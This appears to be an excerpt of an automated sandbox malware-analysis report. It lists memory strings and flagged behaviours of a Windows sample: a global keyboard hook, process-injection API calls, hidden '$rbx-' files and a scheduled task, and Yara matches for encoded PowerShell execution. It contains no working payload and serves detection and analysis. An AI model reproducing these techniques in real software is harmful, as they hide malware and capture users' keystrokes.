Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Contains functionality to call native functions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0FF4 NtResumeThread,	36_2_00007FFD9B8C0FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0F30 NtSetContextThread,	36_2_00007FFD9B8C0F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,	36_2_00007FFD9B8C0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,	36_2_00007FFD9B8BE0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,	36_2_00007FFD9B8C0A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,	36_2_00007FFD9B8BE088
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	39_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,	40_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	42_2_000002BAAEE42C80
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,	45_2_0000016CE6532300

Creates files inside the system directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Deletes files inside the Windows folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1

Detected potential crypto function

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCC94	19_3_00000224138DCC94
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138D23F0	19_3_00000224138D23F0
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCE18	19_3_00000224138DCE18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413902FF0	19_2_0000022413902FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413932FF0	19_2_0000022413932FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CE18	20_3_000002BCD7E0CE18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CC94	20_3_000002BCD7E0CC94
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E023F0	20_3_000002BCD7E023F0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E32FF0	20_2_000002BCD7E32FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE3D2	36_2_00007FFD9B8BE3D2
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CE18	37_3_0000026504E7CE18
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CC94	37_3_0000026504E7CC94
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E723F0	37_3_0000026504E723F0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894	37_2_0000026504EAD894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA2FF0	37_2_0000026504EA2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CC94	38_3_0000025DC1A9CC94
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A923F0	38_3_0000025DC1A923F0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CE18	38_3_0000025DC1A9CE18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001CF0	38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002D4C	38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140003204	38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002434	38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001274	38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC2FF0	38_2_0000025DC1AC2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE2FF0	38_2_0000025DC1CE2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CE18	39_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC6123F0	39_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CC94	39_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642FF0	39_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC672FF0	39_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCE18	40_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ABCC94	40_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0AB23F0	40_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894	40_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2FF0	40_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCE18	41_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612D23F0	41_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612DCC94	41_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A661302FF0	41_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCE18	42_3_000002BAAEDBCE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDB23F0	42_3_000002BAAEDB23F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDBCC94	42_3_000002BAAEDBCC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CE18	42_3_000002BAAED8CE18
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED823F0	42_3_000002BAAED823F0
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED8CC94	42_3_000002BAAED8CC94
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDC2FF0	42_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42FF0	42_2_000002BAAEE42FF0
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CC94	43_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879923F0	43_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A8799CE18	43_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879C2FF0	43_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F42FF0	43_2_0000026A87F42FF0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CE18	44_3_000001795377CE18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795377CC94	44_3_000001795377CC94
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_00000179537723F0	44_3_00000179537723F0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537A2FF0	44_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894	44_2_00000179537DD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D2FF0	44_2_00000179537D2FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CC94	45_3_0000016CE5E2CC94
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E223F0	45_3_0000016CE5E223F0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E2CE18	45_3_0000016CE5E2CE18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532FF0	45_2_0000016CE6532FF0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CE18	46_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D53CC94	46_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D5323F0	46_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894	46_2_000002295D56D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D562FF0	46_2_000002295D562FF0

One or more processes crash

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
Source: unknown	Process created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2674	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682	Jump to behavior

Yara signature match

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.dr	Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr	Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
